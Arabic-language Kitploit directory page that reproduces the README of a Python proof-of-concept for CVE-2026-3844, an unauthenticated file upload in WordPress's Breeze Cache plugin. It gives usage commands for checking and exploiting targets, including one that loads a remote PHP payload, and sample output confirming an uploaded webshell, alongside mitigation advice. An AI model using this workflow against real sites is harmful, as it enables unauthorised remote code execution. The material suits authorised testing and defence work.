Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sahmsec/cve-2026-3844
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

إثبات مفهوم بلغة بايثون لثغرة CVE-2026-3844، وهي رفع ملفات تعسفي غير مصادق عليه في إضافة Breeze Cache الخاصة بووردبريس، مما يتيح تنفيذ الأكواد عن بُعد. يتضمن الكشف والاستغلال والتحقق من القشرة الويب.

عرض المستودع
5منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-3844 — WordPress Breeze Cache رفع ملفات غير مصادق عليه

نظرة عامة

يحتوي هذا المستودع على سكربت إثبات مفهوم (PoC) بلغة Python لعرض ثغرة رفع ملفات تعسفي غير مصادق عليه (Unauthenticated Arbitrary File Upload) التي تؤثر على إضافة Breeze Cache لـ WordPress <= 2.4.4.

⚠️ هذا المشروع مخصص حصريًا لـ اختبارات الأمان المصرح بها، والبحث التعليمي، والتحقق الدفاعي فقط.


معلومات الثغرة

  • معرف CVE: CVE-2026-3844
  • الإضافة المتأثرة: Breeze Cache لـ WordPress
  • الإصدارات المتأثرة: <= 2.4.4
  • نوع المشكلة: رفع ملفات تعسفي غير مصادق عليه
  • الأثر: احتمالية تنفيذ كود عن بُعد (RCE)
  • ناقل الهجوم: عن بُعد / غير مصادق عليه

تستغل الثغرة وظيفة تخزين gravatar المؤقت في Breeze Cache لتخزين ملفات يتحكم بها المهاجم داخل دليل الكاش الخاص بـ WordPress.


الميزات

  • وضع اكتشاف الثغرة
  • سير عمل استغلال آلي
  • دعم التحقق من الويب شيل (Webshell)
  • مخرجات طرفية ملونة
  • تحميل حمولة عن بُعد
  • فحوصات التحقق من الرفع
  • تسجيل مخرجات اختياري

المتطلبات

  • Python 3.8+
  • pycurl
  • termcolor

تثبيت التبعيات:

root@kitploit:~
pip install pycurl termcolor

الملفات

الملفالوصف
CVE-2026-3844.pyسكربت الاستغلال الرئيسي (PoC)
CVE-2026-3844.yamlقالب/إعداد YAML

الاستخدام

التحقق مما إذا كان الهدف يبدو عرضة للثغرة

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com --check-only

تشغيل الاستغلال

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

حمولة مخصصة

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php

حفظ النتائج

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -o results.txt

كيف يعمل

ينفذ السكربت الخطوات التالية:

  1. يكتشف إصدار Breeze Cache المثبت
  2. يتحقق مما إذا كان إصدار الإضافة عرضة للثغرة
  3. يرسل طلب تعليق WordPress مُصمم خصيصًا
  4. يستغل معالجة gravatar في كاش Breeze
  5. ينتظر توليد الكاش
  6. يتحقق مما إذا كان الملف المرفوع أصبح قابلًا للوصول
  7. يختبر استجابة الحمولة

المسار المعرض للثغرة

قد يصبح الحمولة المرفوعة قابلة للوصول من:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/

ملاحظات

قد يعتمد نجاح الاستغلال على تمكين الإعداد التالي في Breeze:

root@kitploit:~
Host Files Locally - Gravatars

إذا كانت الميزة معطلة، فقد تفشل محاولات الاستغلال.


مثال على المخرجات

root@kitploit:~
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

إخلاء مسؤولية

تم توفير هذا المستودع من أجل:

  • البحث الأمني
  • الأغراض التعليمية
  • اختبار الاختراق المصرح به
  • تقييمات الأمان الدفاعية

لا تستخدم هذا المشروع ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذا المشروع.


توصيات التخفيف

يجب على مسؤولي المواقع:

  • تحديث Breeze Cache إلى أحدث إصدار مصحح
  • تعطيل ميزات تخزين الملفات غير الضرورية
  • تقييد رفع الملفات الخطرة
  • تعطيل تنفيذ PHP داخل أدلة الكاش
  • مراقبة /wp-content/cache/ بحثًا عن ملفات مشبوهة
  • نشر جدار حماية لتطبيقات الويب (WAF)
  • فرض تحقق صارم من جانب الخادم

بيان الغرض التعليمي

تم إنشاء إثبات المفهوم هذا لمساعدة:

  • باحثي الأمان
  • مختبرِي الاختراق
  • فرق الدفاع (Blue Teams)
  • مسؤولي WordPress
  • المطورين

على فهم المخاطر الأمنية المرتبطة بآليات التخزين المؤقت غير الآمنة ورفع الملفات التعسفي.


المراجع

  • قاعدة بيانات CVE
  • استشارات أمان WordPress
  • إرشادات OWASP لأمان رفع الملفات
  • توثيق إضافة Breeze Cache

المؤلف

مشروع بحث أمني / تعليمي

تنزيل الأداة